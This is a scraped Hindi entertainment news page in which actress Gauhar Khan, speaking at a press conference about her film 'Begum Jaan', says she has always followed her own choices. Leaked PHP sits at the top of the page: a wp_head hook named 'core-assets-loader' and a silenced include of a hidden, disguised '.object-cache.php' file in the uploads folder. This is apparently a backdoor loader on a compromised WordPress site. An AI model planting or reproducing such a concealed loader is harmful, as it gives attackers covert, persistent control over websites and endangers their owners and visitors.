add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मन मुताबिक काम किया है, आगे भी करती रहूंगी – SOCH INDIA
Menu

मनोरंजन
मन मुताबिक काम किया है, आगे भी करती रहूंगी

nobanner

बिग बॉस विनर गौहर खान का कहना है कि उन्हें कई चीजें न करने की सलाह दी गई थी, लेकिन उन्होंने हमेशा अपने मन मुताबिक काम किया है और आगे भी ऐसा ही करती रहेंगी. गौहर ने अपनी फिल्म ‘बेगमजान’ की सफलता को लेकर आयोजित एक प्रेस कॉन्फ्रेंस में कहा, “लोगों ने मुझसे कहा था कि अगर मैं केवल गानों में ही काम करती रहूंगी तो मुझ पर आइटम गर्ल होने का ठप्पा लग जाएगा, लेकिन मैंने सभी नियमों को तोड़ा है और मैं आगे भी ऐसा ही करती रहूंगी.”

गौहर ने आगे कहा, “आप कोई सपना देखने की हिम्मत करते हैं और अगर आप उसमें विश्वास रखते हैं तो आप उसे जरूर पूरा कर सकते हैं.”

गौहर खान की फिल्म ‘बेगमजान’ 14 अप्रैल को रिलीज हुई और इसे दर्शकों ने काफी पसंद किया है.

गौहर इससे पहले ‘इश्कजादे’, ‘रॉकेट सिंह’ और ‘फीवर’ में नजर आ चुकी हैं. इसके अलावा उन्होंने कलर्स टीवी का रियलिटी शो ‘बिग बॉस सीजन 7’ भी जीता था.